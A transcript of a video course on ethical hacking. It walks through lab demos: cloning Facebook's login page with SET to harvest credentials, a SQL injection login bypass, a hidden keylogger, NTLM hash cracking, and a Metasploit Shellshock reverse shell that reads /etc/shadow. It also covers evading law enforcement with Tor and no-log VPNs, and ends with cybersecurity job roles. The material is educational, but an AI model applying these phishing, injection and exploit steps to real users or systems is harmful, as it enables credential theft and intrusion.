engineering toolkit which you would find in this option and that's the tool that we want it's a command line tool a menu driven tool we are going to host a fake facebook page and we can see how we can harvest credentials by this kind of an attack so these are some disclaimers you might want to go through that do you want to agree to the terms of service yes press enter and that's your social engineering toolkit and we are talking about a phishing attack which can comes under the social engineering attack so it like i said it's a menu driven tool so we just have to look at these options and then just type in the number of the option that we want so we want to do a social engineering attack so i type in one press enter in that it is asking me whether i want a spear phishing attack a website attack vector we are going to choose a second option so i type in two press enter and then it asks me what i want to do i want to take the third option here credential harvester attack methodology and we want to do the third attack now it is asking whether we want to use the in-house website templates that it already has or do we want to clone a site or do we have a customized site that we have prepared that we want to migrate into this tool we're going to do the site cloning option so we're going to type in two press enter and then it is going to ask me the ip address where it wants to capture and store the credentials by default this is the ip address that i'm using so if i leave it blank it will take my default ip address so i'm just going to press enter and now it is asking me the url to clone so i type in https www.facebook.com what it is going to do it is going to connect online and it is now just it has cloned the website facebook login.php the best way to use this attack is that you if you use the if the username and password form are in the same field or the same page regardless this captures all posts on a website so you may need to copy www.start into html depending on where your directory structure is press return if you understand what we are seeing here so press enter the social engineering toolkit credential harvest attack is running on port 80 information will be displayed to you as it arrives so the site was 71.134 right the default ip address and this is where the website is being hosted let's check that out so let me open up a browser on my host machine and let me point it to the kali linux machine that we have just created 192 168 71.134 and you should see a login to facebook coming up right here looks genuine it is genuine because we just went online and downloaded this let's just have a recap let's have a explanation of what we are trying to do i am trying to host fake facebook page on my server which has an embedded script in it which is going to do credential harvesting so the attack here is let's say if i am now hosted this i can craft a fake email send it across to a victim saying uh your facebook account has seen some unforeseen activity create a hyperlink using html coding within that click here to access your account and verify uh that the account is secured and when they click on that link they will be redirected to my fake page which is here you can see the uh ipr this is my virtual machines ip address but i'm seeing a facebook login page and i'm going to type in someone at somewhere.com and the password i'm just going to type in the regular ones that i use and if you see it when we typed in uh the username and password the page just refreshed and gave us the login page again but now if you look at the url i'm actually on facebook's login page which is exactly the same that i was hosting so a layman wouldn't probably figure out they've been hacked by now they just would figure out okay they probably typed in the incorrect password and the page refresh or something like that and they're just going to log in and they're actually going to access the facebook page thus they might not even realize that something went wrong but if i go back to my virtual machine you can see that it has captured some data and it is reporting over here of what has happened so if i just scroll up let's see what happened here and if you have been able to capture anything so we gotta hit printing the output this does the http 1.1 200 okay response coming in password field found and we just looking there it is email someone at somewhere.com and uh password that i typed in asd at the rate one two three four so it has captured the username and the password right here uh once you're done i mean this is the way attackers work now this is a very basic attack again uh in the actual trainings you would then look at how you would host this on a real website make it a global attack right now it's a virtual machine with a class cip address so here the thought process is where can we get a free hosting where we can host this kind of sites maybe i'll have to purchase a domain which looks like similar to facebook or the victim that i'm trying to attack so this is just a poc so we just wanted to find out if we can uh how phishing is done and this is exactly how it is done right so pressing ctrl c would exit this tool and takes you back to the actual menu press 99.99 to exit and there it is close the two window and that's the phishing practical after phishing let's talk about sql injection sql injection stands for uh structured query language injection which is a database attack though it resides within the application so it's the application vulnerability that we are trying to look at to try to bypass authentication as the name suggests a sequel injection vulnerability allows an attacker to inject malicious input into a sql statement what is a sql statement a query that is used by an application and is fired off to the database database executes that query gets that information that is required and sends it back to the user if the user is authenticated so we're going to look at the sql injection attack demo here and what we are going to do is we are going to go back to our vmware workstation and i have got a tool over here called ovasp broken web application which is a utility that has been created for people like us to test our skills to learn on how we can develop our skills further so this has a lot of vulnerable applications built within it we're just going to try to access it and we are going to see if we can create a sql injection attack just waiting for it to boot up once it boots up it will give us an ip address there we are so we need to connect to 71.132 so i can just use the same browser i was using close up facebook and now go to 192.168.71.132 and this is the ovas broken web application project uh what we're going to do is we're going to go to utility and this is a application that has a lot of information within it you can see it gives you links about what you should do help me video tutorials listing of vulnerabilities that they have and so on so forth so you can see we are not logged in right now i'm just going to do this as a demo so what we're going to do is we're going to look at this and bypass authentication so we are taking to the login page where you need a username and password to log in i'm going to type in test as the username and test as the password click on login and you can see that account does not exist so the authentication mechanism works now what we want to do is we want to create a query now what does a query look like when i type in a username and a password if i just type in a single quote here it is going to create an error and this is what the sql query looks like select username from accounts where username is a single quote and then the exception error happened so it's not showing the rest of the query to us now what i'm going to do is i'm just going to craft a query here a single quote and give it a condition or one equals one space hyphen iphone space what happens hyphen hyphen space is comments out anything after that so the password field is being commented out at this point in time and i'm just giving it a condition where the condition is true one does equal one and if this condition is true it is going to allow me to log in so you can see right now we are not logged in this bypasses the authentication mechanism and you can see user authenticated and we are now logged in as admin so uh in the training what we need to understand uh as a whole is how sql works what are the queries that are structured with how you can what are the testing operators now the single quote that we used that was an operator in the sql syntax what these operators are how they function and then how you can leverage these attacks there are different tools that are given to you in kali as well that you can utilize so in kali linux you can just open up a command prompt and there's a tool called sql map you need to give it a particular site so sql map hyphen u for the url and whatever the url is now url here and then once you're here you just press the enter key this tool will craft all the queries in the background for you you don't even have to no sql query or sql languages uh this is a very easy tool to utilize sadly i cannot demo this on a live website because that would be illegal but you can see how you can operate this yourself that's what sql injections are all about moving on we now talk about vpns virtual private networks and a virtual private network is basically a secure network that allows me to anonymize myself over the internet so what i'm doing is i'm connecting from here to a server that encrypts my channel encrypts my connection and does allows me to keep my data secure now the basic essence of a vpn or a virtual private network is to allow me this encryption mechanism where i can encrypt and safeguard my data the added advantage that nowadays a vpn gives is that you can allow us to spoof our ip address or obfuscate our ip address so we can actually become anonymous on the internet it can allow us to use multiple ip addresses and thus secure ourselves on the internet for example i use vpn called cyberghost and what this allows me to do is it allows me so many servers over here and if you look at the entire list all the servers then there are no spy servers which and guarantee me that they are not going to keep and store any logs and thus they are not going to record any of the activity that i'm doing right since they are located out of romania this becomes a little bit more safer for me because the government and the laws over there are a little bit more relaxed than other countries uh they give me different links for torrenting for streaming for connection features so there are a lot of vpns out there so for example let's go to the website cyberghost.com so we can see there's a sale going on 76 percent sale or you can go on to express vpn which is also very good vpn then there is not vpn it depends on what you want and how you want to utilize it so just purchasing a vpn or getting a free free vpn is not enough it depends on which country the vpn originates from and which server you're connected to for example most of the countries have a pact where they share information amongst themselves even if you're connected to a vpn that means that these companies that provide these services have to generate and store logs and these logs have to be reported to the government if they ask for it now if there's a list of 14 countries that actually uh focuses on this practice so you have to find out vpn that and a server that is not a part of those 14 countries and ensure that those logs are not going to be reported to the government and these are three vpns basically are something that which are good and i personally use cyberghost i have used others i just keep on rotating them just to get an idea of which one is better so these are vpns that can allow you to anonymize yourself on the internet moving on uh these are the ones that we talked about there are other safer vpn hide my ass expressvpn and so on so forth from our terminologies let's now talk about vps vps is basically virtual private server where you can rent a service or server as a service a virtual machine as a service so basically on a cloud using infrastructure as a service you can rent a server and utilize it for whatever activity you want so let's go to these sites register.com godaddy network solutions or we can talk about other cloud solutions as well so here you can get register your domain names uh so in the previous exercise for let's say when we talked about the phishing exercise what we want is we can go on to register.com or we can go on to godaddy.com and we can purchase a particular domain for example something like this instead of the os i'm typing in a couple of zeros for the facebook and see let's see if anything of that is available now something.photo is available or facetips.com is available uh there are other options that are making over here that they're giving us over here and once we purchase this we can then have our own hosting uh with our web hosting as a service and uh you can have a linux based uh hosting or a windows based hosting depending on what you want and that's where your shared hosting comes with the picture if you just want uh if you want to look at a virtual server and you want to render server over there itself you can move on to rackspace.com and here in your services you can have physical server or a virtual server in a public cloud your other cloud providers for example would be amazon aws and on aws you can basically look at ec2 elastic compute cloud which is basically virtual servers in the cloud and over here you can rent out a server with whatever capacity you require you'll obviously have to pay rent for what those servers are going to cost but once you have those servers you can then launch any services on top of it looking at other services that we have we talked about tar tor is a onion routing software that allows users to browse the web anonymously so we can just go online and we can try to spoof our identity and i'm going to show you how so i've got a vmware workstation right here the one so we're just going to pull that up and we're going to power on a windows 7 machine where we are going to look at the onion routing so windows machine has booted up we're just going to log in and uh this is my windows 7 machine now i've got a chrome browser right here and we're going to go to a website called cmyip.com which is going to give the ip address that i'm currently using so right now i'm not on connected to any vpn or anything and you can see that's my ip address that i'm utilizing now if i want to anonymize myself what i'm going to do is i am going to use star and that's the top browser that's set up right there if i click on it it's going to open up the software and it's going to create a new network and it's going to connect to the tor network and allow me to anonymize myself right so that's the top browser opening up and giving me a new browser over here so i've got one which is the old one which is uh my current ip address if i just refresh that you'll see that i'm still on the same ip address as far as this browser is concerned there's a refresh and it's still showing me the same ip address where if i go on to thor right now and if i go to see my ip.com you will see that it is going to give me and you can see the amount of time it is taking to reach that site that's because i am using a vpn and there's a lot of encryption running off and you can see now i'm certainly connected via hong kong and even to reach this site what tor does is it gives me a proxy chain a proxy chain is where it creates multiple hops to hide my identity and before i reach see my ip.com i am using three different ip addresses over here one in france one in germany and one in hong kong so if i do something over here to trace back my steps to my actual ip address the law enforcement agencies or anyone who is going to search like a forensic investigator would have to go through these ip addresses before they come back to me now it's not impossible but the effort and time that's going to be taken to come across three different countries is going to be phenomenal so it may just defeat the purpose of having so much resources spent to identify who did what so that's what thought does for us all right moving on from tor we are going to look at keyloggers keyloggers are basically softwares that run in the background and record all the keystrokes of the user so if i've got a keylogger installed right now whatever i type will be stored in a text file for the hacker so that they can look at it later on and just to give you an example of that we go back to my vmware workstation and we open up another windows 7 machine i'm going to power this on and i'm going to close this one till then so this virtual machine has booted up we are going to use user one login as user one just close all these softwares uh which are not required and once this machine is booted up what we're going to do is i'm just going to open up a random websites and see what we're doing basically there's a key logger that's there in the startup that's going to record our keystrokes and we just want to see what it actually does now firefox is getting updated so let's hold on now this is the latest version of firefox right and we're just going to go to let's say facebook.com wait for the website to open up all right let's try opening it up again and that's facebook.com and we're just going to type in some random username and password somewhere someone at somewhere.com and the password being again asd rate one two three four five six seven eight nine zero log in obviously that login is not going to work user probably doesn't exist or if it does the password probably is kind of incorrect and uh so we're going to close this we're going to let's say open up another browser window go to another site if.com and then go to red if mail try the same thing over here someone at somewhere.com password is right one two three four five six seven whatever it is don't say we can see the combination is incorrect now there's a keylogger running in the background and what we want is we now want to open up the keylogger now it is visible here because i've kept it visible you can hide it in the start menu and there's a shortcut key for you to pull it up later on so this completely becomes invisible and what it can do is it basically creates a record of whatever you have been doing so far so you can see these things populating on the 25th of december so if i look at the visited website you can see i opened up mozilla firefox the first where it there was a problem loading the page then we opened up facebook then we opened up rediffmail.com and so on so forth said this it just gives me the list of visited websites whereas if i look at keystrokes and clipboard you will see whatever we have typed in so we first typed in facebook.com then again uh the second time i try try to type in then i hit backspace then i type in facebook.com and then you can see i typed in someone at somewhere.com and then tab ast at the rate one two three four five six seven eight nine zero we closed up the browser we opened up a new one and we went on to redevmail.com and then you can see me typing this one then going back one space then the rest of what i typed and then the password coming in so that's what a keylogger does if you look at the taskbar it's not going to show you a keylogger running in the background it's in processes you're not going to see anything at all but it's going to mask itself as a service so if you look into the properties you can see that icon coming in over here which matches this one and so you can see that this is masking itself as a service dot exe if this gets hidden as well it would be very difficult for a user to even identify this all right so that's what a keylogger is moving on let's see what else we want to talk about so we've talked about tar we have talked about key loggers and now we want to talk about firewalls now for keyloggers to be prevented we need antiviruses right so we need a good antivirus program that's going to be installed updated and run on a regular basis to protect ourselves from malware but what about network connections and you need a firewall and a system to prevent or to detect what kind of connections are going on in the first place now we cannot rely on software's 100 so even if a firewall is not configured properly that's that's going to be a problem so what we need to do is we have to have a firewall configure it correctly and then allow and disallow certain activity from off uh happening and what we're going to do is i've got such a system on my machine here i use a software called glasswire what it does is it is a network analyzer so it allows me to analyze whatever is going on you can see all the apps that i'm utilizing and how much upload and download they have been doing all the traffic so you can see the protocols that i'm utilizing so i come to know what's going on in the background and this gives me the entire graph of how much i have been doing for the past 24 hours past three hours past five minutes and so on so forth right so this is what the activities and these are the alerts that it has been generating i can click on those alert and it will start telling me what it was all about if the graph doesn't work for me it gives me usage as well so how much i have utilized since i've installed this software right and what applications have been utilized which hosts i've been connected to and the traffic type that was utilized and then the things on my network so these are the devices that i have currently on my network that has been that have been identified and then comes the firewall so on the firewall the firewall is clicked on you see all those services that have been identified and you can just click on a particular service to lock that service so this becomes a discovery tool identifies whatever networking is going on gives me all that information and then i can look at and i can just click on any of these services that i find it as malicious and block them i can create different profiles for different applications as and when i want them and these are the alerts so you can see that this was the first time a network connection was looked at from vmware and what this allows me to do is whenever i execute a file it can upload it to virustotal.com and scan it as a third-party antivirus to ensure that there is nothing malicious on it so i already have an antivirus over here but if this ever gets compromised i still can rely on a third party service where in real time as an and when i execute my applications uh they would be verified and i would be assured that nothing is wrong with my system and this software that i'm utilizing glasswire basic is free and then there are paid versions as well it's just glasswire.com is where you're going to find this moving on rootkit rootkits are also malicious softwares that you allow and unauthorized user to have access to a computer to restrict areas of its software now a root kitten is a census which uh a software a malicious software that infects a machine and prevents a from some functionality from it like hiding data or preventing users from running antiviruses and it's basically a malicious software that is used to hide information from the victim so that they would not realize that they have actually been compromised it's going to be a difficult showing of a root kit so i cannot show that demo to you so we're just going to move on and are going to talk about ethical hacking techniques now now when we say ethical hacking techniques we want to look at what kind of audits are available when we want to do ethical hacking so uh there's a black box audit a white box audit and a gray box audit so if i'm invited in an organization to conduct a test to conduct a audit to conduct a vulnerability assessment or a penetration test to identify vulnerabilities and then try to plug them out they are going to give me three different variations in a black box audit they're not going to tell me about the infrastructure they're not going to give me any information and they want me to start from the basics of gathering information identifying the systems and based on the information that i gather whether i'm able to develop any hacks and compromise their infrastructure so it will be a simulation of a hacker who's sitting outside the organization and trying to find a way in whereas a white box audit is where full infrastructure knowledge is given anything and everything that is required for an audit is given and this is a simulation of an insider attack a person sitting inside the organization misusing their permissions and then trying to compromise trying to get access to data that they do not have access to so the simulation is from a malicious insider a gray box is where some partial knowledge is available and from that partial knowledge you're going to try to build up more information and then you're going to try to get access to those resources what are the tools that we utilize so we've already had a couple of demos on keyloggers sql injection sql map and so on so forth metasploit is a very much used tool for penetration testing and uh having knowledge on metasploit is very much necessary as far as ethical hacking is concerned nmap this is a tool used for network discovery necessary scanner wireshark is a packet capturer that allows you to capture packets and analyze whatever is going on sql map is something that we have seen a sql injection attack tool which generates its own queries and john the ripper is a password tracking tool uh backtrack used to be an operating system that was utilized for penetration testing however backtrack has now been replaced by something called kali linux and that's the operating system that we have utilized in all our demos where we tried to look at sql map and those injection attacks that we did so what are the areas of ethical hacking we have just talked about all these areas as well network services we looked at the glass wire application that showed us how my machine is consuming networks which protocols are being consumed how the connections are being uh created if somebody's able to install a trojan on my machine it is going to try to create a new connection on the network with the hacker to allow that hacker a backdoor access now if i have that glass wire or a similar firewall implemented it is this wire wall that is going to detect it and prevent that connection from happening so if i install a software that is certainly suspicious or that install something else in the background that i may not be aware of that tool is going to identify all the connections that are being made and it is going to highlight that connection i need to go through all of those connections and identify whether they are legit or not and if i find some suspicious or doubtful i'm going to block that connection and then i'm going to investigate what's going on and that's where ethical hacking comes into the picture you want to find out if your firewall that you have implemented is going to work correctly or not if the configuration of the firewall is done properly or if the firewall is misconfigured is it leaking out information right at the same time you're looking at web applications we looked at the ovas broken web application where we did some sql injection attacks right so that was a weakness or a vulnerability in that application which would allow us to bypass authentication and get access to resources that we were not authorized for and then client-side attack should be where uh you install keylogger at the end of the at the client system and then you try to capture whatever data the user is typing in like usernames and passwords on the facebook and the rediff mail.com website that we saw and then try to misuse that information to get access to those resources then wi-fi networks right wi-fi is something that we use on a regular basis we got our smart devices nowadays smartphones tablets phablets that we can connect to wi-fi and start using all our services our banking applications and our smartphones and thus we want to ensure that wireless connectivity is simple and is secured so you want to use encryption mechanisms you want to use tools on your smartphones anti-viruses firewalls on your smartphones to ensure that whatever you are utilizing is going to remain secure and in social engineering we've looked at the phishing website on facebook.com we've seen how easy it is to clone websites and host them on apache server so if you look at it from ethical hackers perspective the job of ethical hacker is to simulate these kind of attacks that the hacker may conduct and first of all you basically going to find out areas where these attacks can happen think of it from a hacker's perspective try to simulate those attacks and see if those attacks are going to be effective can those attacks be prevented and can your current security controls that you have put in place identify detect and prevent these attacks from happening in the first place and that is what ethical hacking is all about let's look at the metasploit attack metasploit is a framework of penetration testing that makes hacking very simple you just need to know how to utilize the tool you need to identify the vulnerability associated with a particular exploit and then run the exploit on metasploit we'll be demoing this during the practical so there are active exploits and passive exploits inactive exploits exploits a specific computer runs until execution and then exits uses brute force and exits when an error occurs in a passive exploit these exploits wait for incoming requests and exploit them as soon as they connect they can also be used in conjunction with emails and web browsers so in passive exploits we create a payload we like a reverse connection payload we send it to the victim once the victim installs that software the machine will then initiate a connection to us our machine will be in a listen mode and then we will once the software is executed there and we would then try to connect and exploit that particular vulnerability this is the uh practical that we'll be doing on metasploit so let's move on with the demos and then we'll see what we can discuss amongst them all right let's have a look at some of the demos that we had talked about in the ethical hacking and penetration testing module we are going to look at three different demos the first one is going to be a sequel injection attack that we are going to perform on this tool that we have the second one is a password tracking attack on windows 7 and the third one is a meter breeder based or a metasploit based shell shock attack on a linux based web server so let's get cracking i've powered on this virtual machine uh which is the ovas broken web application it is a tool that is provided for people who want to enhance their skills and they can practice how to do these attacks in a legal manner so we are going to go to this site i'm just going to open up my browser the ip address is 71.132 and that's the ova's broken web application that we want to utilize we're going to head off to mutilate a2 and we are going to look at a sql injection attack where we want to bypass authentication now this takes us to the login screen so we can just try our luck here and see that the authentication mechanism works the account does not exist so the username and password that we have supplied is not the correct one so we want to ensure that there's a sequel database and we can try to attack it and see if we can bypass the authentication now what we want to do is we want to create a sql based malform query that can give us a different output so i'm just going to type in a single quote over here and type login and you can see that this is now suddenly recognized as a operator and there's an error that is given out compared to the login that we tried earlier when we used a proper text based login mechanism it gave us the account does not exist but here the single quote gave us a error and it shows us how sql works this is the query that we had created now in the trainings that you have for ethical hacking there would be explanations of what this queries are all about how the syntax works here we're just going to see if we can create a malform query to log in as a user in this case so what i'm going to do is create the query over here and we're going to give it a comparison so we're going to give it r one equals one space hyphen hyphen space and if you now click login you should be able to bypass authentication and you can see user has been authenticated and we now have admin access to this application now here the sql queries need to be crafted in such a perspective that they're going to work so there would be a lot of exercise in identifying what the database is there's a microsoft database an oracle database and so on so forth and then you have to choose those proper commands but identifying that would come in the training right now we're just looking at them at a demo this is how a sql injection attack works now let me log out here similarly now we are in a login page the same query worked wonders where it allowed us to bypass authentication so it also depends on what kind of a page i am and what query would be accepted at this point in time so here application understanding would also come into the picture where uh which function we are calling upon when we are connected to a particular page now this is a user lookup function right so again here we try the same method test test that's not going to work authentication error bad user or password and if you type in the same query over here single quote or and give it a condition single quote or one equals one space hyphen iphone space now here it is not going to log us in because this is not a login page this is a user lookup form so here it will instead give us a dump of all the databases that it has so you can see all the usernames and passwords coming in that are stored in the user lookup field so this is where the understanding comes in of which query to create at what page we are depending upon the function that is being called right so that's the sql uh injection attack that we wanted to look at let's move on to password tracking now this is a windows 7 machine that we have i'm just going to do a very basic password tracking example we're just going to log in now here the assumption is that we are able to log in we have access to a computer and we want to check out other users who are using this computer and see if we can find out their passwords so that we can log in as a different user steal data if required and we wouldn't be to blame if there are any locks that are created so here we've got a tool called kane enable that is installed right here now i'm already an administrator on this machine i'm checking out other administrators who share the same privileges or any other user who may be on this system whose password i can crack and thus i would be able to get access to their account and then do any malicious activity right so this allows me to go into a cracker tool and it allows me to enumerate this machine and identify all the users and passwords that are there in this particular machine right so i'm just going to click on the plus sign and i'm going to import hashes from a local system so where are these files stored where does windows store its passwords in what format are they stored and what this tool does to retrieve those that's something that we all need to know as ethical hacker right so import the hashes from local system click on next it's going to enumerate that file and it is going to give you a list of all the users that are there so you can see the users are hacker admin test the one that we are logged in as and then the user called virus as well and you can see that this is the hash value of the password that is being utilized now there's a particular format for the hash value for windows and how it stores but once we have these hash values let's say if i want to crack this password there are various attacks that we can do for example a dictionary based attack or a brute force attack let's try a brute force attack right ntlm is the hashing mechanism that is used by windows so we are going to try to create an ntlm hash attack and here we are going to use a predetermined rule set for example we are not sure what characters are being utilized over here so we just create an attack like this using all characters and uh lowercase a through z uppercase a through z numeric zero through nine and all the special characters let's say the password is between 7 and 16 characters and this is the character set that we want to try the brute force attack on what is a brute force attack it is an attack where the computer is going to try each and every permutation and combination out of this character set and try to figure out if the password is going to be correct so if we click start it's going to start with a particular characters and then it is going to identify if that ntlm hash is going to work against this character and you can see the time is going to be phenomenal over here so it's not necessary that this attack would be viable it will be 100 successful given the time frame however the time frame is huge enough for this attack to become a little bit redundant there are other attacks that we can do which can easily identify this data for us as well but that is something that we will look on in future videos so that's how we can get access to users and passwords uh there are different mechanisms where let's say we don't have login access then what are we going to do how we can create a fake user login or how we can remotely access a machine and then try to get the same access and that is what we are going to try to do in the next demo on a linux machine so what we are doing in a linux machine could also be doable on the windows machine with a different exploit so what i'm going to do is this is the linux web server that i have that i'm going to power on i'm going to use a kali linux machine to hack that device and i'm going to just power off my windows 7 machine give it a minute till it boots up now this is also a demo machine that we have which has its own pre-configured vulnerabilities so here we've got something from the pentester's lab and has a shell shock vulnerability implemented inside shell shock vulnerability affects linux mac and unix-based operating systems for a particular version of the bash shell bash is the bone again shell which is the command line interface in these operating systems so what we are trying to do here is we are going to use the kali linux machine try to find out the vulnerability over here and if it exists we are going to use metasploit to attack this machine now the first and foremost thing is we want to identify the ip address we have no idea what the ip address is we are in the same subnet so we are assuming that we are able to connect to this machine so what i'm going to do is i'm going to open up a tool called zenmap i'm going to open up a command line interface find out what my ip address is and my appearance is this with a subnet mask of two five five two five five two five five dot zero so i want to see if there are any other machines that are live in the same subnet and we are doing a pink swipe over here to identify which machines are live in a minute we'll get all the ip addresses 71.1 to 133 254 and 120 we know that we are 128 at this point in time uh 254 is the dhcp server so we are assuming that 133 is the machine that we want to look at and let's then try to see if we can scan that machine 133 and we're going to do an intense scan to find out which ports are open what services are running over there and if it is whether the pen test machine that we were looking for you can see of the start port 22 and port 80 and somewhere here it's going to give us the ports that are open and the details about those ports and somewhere here it will tell us that this is the pentester lab machine that we wanted which is correct so now we want to do a vulnerability analysis on this what we're going to do is i'm going to use another gui based tool called sparta which i can just find out from here sparta uses two tools in the background a nmap tool and a tool called nikto so we're just going to start scanning 192 168 71.133 was the ip address add to scope and over a period of time you can see all of these will start populating with information there we are that's the nikto tool coming in scanning on port 80 which is uh which means that it's a web server using http it tells us it's an apache http 2.2.21 and gives us the 22 port number as well if we head over to the tab of nicto or let's look at the screenshot first this is what the website would be looking like and nicto gives us the options over here it tells us that there is a vulnerability over here for shell shock and this is the part where the vulnerability is going to exist so what we are going to do we go back to the command line sorry we open up a new one minimize all these other windows and we are going to open up metasploit metasploit is a penetration testing tool that is used by most hackers and ethical hackers to test applications and test uh existing exploits and vulnerabilities so just give it a minute till it starts you can see there are already around 1700 exploits right here we are going to see all those exploits with these commands there we are sorry for the typo and it will just give us a list of all the exploits that are stored in metasploit in this version so all of these are windows based if we scroll up we will be looking at other vulnerabilities as well or exploits the unique space exploits linux osx multi-exploits and we're looking for a exploit for um multi-based apache or http let's go up let's look at so this is the one that we are looking for apache mod cgi bash environmental executable so what we're going to do is we're just going to copy it go back to the bottom say use exploit and paste the one that we wanted press enter say show options so it will ask us to configure this i'm just going to configure it based on the knowledge that we have set our host which is the remote host the victims machine so we put in the ip address it asks us for the target uri so that's the path that we saw set target uri to cgi hyphen bill slash status enter now with exploit we need to find a payload that is going to give us the output that we want so we say show payloads and it will give us a list of all the compatible payloads with this exploit and we want to create a reverse tcp connection which is this so we know it's a linux operating system we want this payload to be set so set payload press enter that's the payload coming in show options now that we have set the payload this is the options for the exploit and now we want to set our options for the payloads as well so we are creating a reverse tcp connection which means we are remotely executing code at the victim side and making the victim connect back to our machine which means we need to set up a listener so i need to put my ip address over here set localhost or lhost 192 168 71.128 which was rip address show options again just to ensure everything is fine which looks like it is and we then type in the word exploit so that it will start this attack you can see that it has created a meter reader session at the victim site and it has opened up a session so if i do a pwd now pwd is a linux command for present working directory and it will show us that we'll connect it to where w hyphen bin do an ls it will list all the files that's the status file over there do a cd backslash it will take us to the root of this machine now remember we saw the passwords on a windows machine similarly we can head over to the cd etc folder ls and you can see these files psswd and shadow now psswd is the file where linux stores its usernames and shadow is the file where passwords are shown so do a cat command psswd and you can see these users coming up so you can see the last user pentest lab and you can see there are no passwords so let's do a cat shadow and that's your hash value for the password that we have for the user print test lab so these are the different attacks that we need to understand and we need to create based on the vulnerabilities that exist on different machines so we just looked at windows and linux and how we can exploit them depending on existing vulnerabilities as an ethical hacker this is uh what we need to learn in our trainings and then we need to clear our exams based on this knowledge of how these things work so that we get certified and then we can position ourselves for the penetration testing jobs in today's world data is generated in exchange at a high speed did you know that 2.5 quintillion bytes of data are generated every day companies all over the world make crucial decisions by analyzing all of this data with the rise of data there has been a tremendous increase in the number of cyber crimes across the globe to prevent cyber attacks cyber security is implemented so what is cyber security it is nothing but the practice of protecting networks programs computer systems and their components from unauthorized digital access as mentioned earlier companies rely on data and it is required that the data is not compromised or stolen to do this job we have various cyber security professionals who are skilled to protect data from cyber attacks there has been a sky high growth in the number of cyber security jobs this growth will only double in the near future as companies will always be on the lookout for skilled professionals who can protect the confidentiality of the data so now that we know why cyber security jobs are important let us have a look at the various cyber security job rules there are various kinds of cyber security job roles let's go through few of the top paying job roles going in the descending order of the salary structures in the usa we first have the chief information security officer job role followed by the security architect penetration tester then we have cyber security engineer malware analyst and finally we will look into the computer forensic analyst job role i will now preview about each of these job roles individually and look into their responsibilities skills and salary structures both in the usa and in india so let's start off with chief information security officer a ciso is a senior level officer in any organization he is entrusted with the safety of the data in an organization a ciso has various responsibilities they are required to develop implement and maintain an organization's security and risk management program they also communicate with their organization stakeholders and brief them about various information related security concerns by doing so they are able to implement a better security system for an organization at times a ciso would have to also recruit an id team's members they need to make sure that the candidate is knowledgeable and skilled a company's risk and vulnerabilities have to be predicted beforehand prediction of such risks and vulnerabilities are taken care of by a ciso they play a major role in preventing cyber attacks in any organization let's now look at the different skills required to be a chief information security officer first and foremost a candidate must have good communication and presentation skills this is very important for any organization a degree in computer science along with an mba is a preferred qualification mba is not mandatory but there is an added advantage if the candidate has an mba along with a computer science degree the candidate must be good at handling security breaches it is preferred that the candidate has prior experience of handling a security breach and who is also good with incident management many employers prefer candidates who have global certifications to become a chief information security officer the preferred certifications are cism that is certified information security manager and certified information system security professional cissp if a candidate has either of these certifications they have a better chance of getting a job as a chief information security officer let's now move on to their salary structures a ciso earns nearly 180 000 dollars in the usa in india the salary is nearly 25 lakhs per annum that's a lot of money so these were the responsibilities skills and the salary structure of a chief information security officer let's move on to our next role our next role is that of a security architect a security architect maintains the security of an organization's computer systems they prevent the computer systems from malware attacks let's look into their responsibilities first and foremost our security architect identifies weak spots in a system by performing vulnerability tests these tests are carried out on a regular basis along with vulnerability tests risk analysis and security assessments are also done by a security architect installation of routers vpn and firewalls are approved by a security architect these devices are very important when it comes to the security of an information system well a security architect rightly approached the installation of these devices digital signatures and public key infrastructures are designed in addition to all the about responsibilities a security architect also provides technical assistance and guidance to the other security team members let's now move on to the skills required to be a security architect first and foremost the candidate must have a computer science or an information technology degree coming to the experience the candidate must have an experience in the field of risk management as the role of a security architect is a lot to do with managing risks understanding of the network basics and various security protocols along with cryptography is required to be a good security architect lastly the preferred certification to become a security architect is that of a cissp which is certified information system security professional as mentioned earlier this is only a preferred certification a candidate who has this certification has a higher chance of bagging a security architect job let's now look into the different salary structures in the usa and in india in the usa a security architect earns nearly 123 000 dollars per annum in india a security architect earns nearly 20 lakhs per annum so that's all about security architect let's now move on to our next role that is penetration tester a penetration tester also known as an ethical hacker is a cyber security professional who tries to exploit a security system's vulnerabilities just like how a hacker would do a penetration tester mimics the role of a hacker let's look into the various responsibilities of a penetration tester as the name suggests a penetration tester needs to perform penetration tests to discover and identify vulnerabilities in a system in addition to this they are also responsible for designing new penetration tools all the penetration tests results are documented and based on the document new security measures are discussed with the other it team and the management a penetration tester performs tests by developing codes and they also conduct security audits which help them understand the vulnerabilities in a system let's now look into the different skills required to be a penetration tester a candidate must have one to four years of experience in the information security field knowledge of windows linux unix operating systems is required also the candidate must know c and c plus plus languages such as java php and perl are preferred by employers but not a requirement to successfully back the position of a penetration tester the preferred certifications are certified ethical hacker that is ch and certified expert penetration tester that is cept let's look into the salary structures of a penetration tester in the usa a penetration tester earns nearly 117 thousand dollars per annum and in india a penetration tester makes nearly four lakh rupees per annum so those were the responsibilities skills and salary structures of a penetration tester let's now move on to our next job role that is cyber security engineer on the whole a cyber security engineer protects an organization's network and its data they also plan security measures to prevent an organization from cyber attack let's look into the responsibilities of a cyber security engineer they design cyber security platforms for a company they are also responsible for planning and implementing cyber security measures well a cyber security engineer solely designs plans maintains and implements security measures in an organization they are also required to report and communicate with the other teams in an organization a cyber security engineer is different from a network security engineer while a network security engineer looks into the troubleshooting a cyber security engineer looks into the prevention of cyber attacks let's look into the skills required to become a cyber security engineer just like the other job profiles a degree in computer science or information technology is a must well two years of experience in the relevant field is required to become a cyber security engineer a cyber security engineer is needed to design security systems hence a candidate with a good problem solving skill is required along with good problem solving skills the candidate must also be good with networking skills as mentioned earlier knowledge of cnc plus plus is a must java and python knowledge is preferred to be a cyber security engineer moving on to the salary a cyber security engineer earns nearly 96 000 dollars in the usa whereas in india a cyber security engineer earns nearly 7 lakh rupees per annum moving on to our next job role that is malware analyst as the name suggests a malware analyst is one who identifies various cyber threats such as worms viruses trojans boats to understand their nature a malware analyst is skilled at analyzing the different malware threats in a system let's now look into a malware analysts responsibilities they're responsible to identify threats and once they identify they are supposed to document the methods to avoid such malware threats they also research and develop malware protection tools various malware protection tools are developed by malware analysts so that the next time a cyber threat occurs they're able to easily identify in addition to the above responsibilities a malware analyst is also responsible to constantly be updated with the new malware threats moving to the skills required a candidate must know windows linux unix operating systems and knowledge of c and c plus is a must usage of tools like idea pro early ddg reg short and tcp view is suggested having a giac reverse engineering malware certification is a plus point the certification is only a preferred certification it is not a must that the candidate must process this certification moving on to the salary structure a malware analyst earns nearly 80 000 in the usa and earns nearly rupees 6 lakhs per annum in india so those were the skills 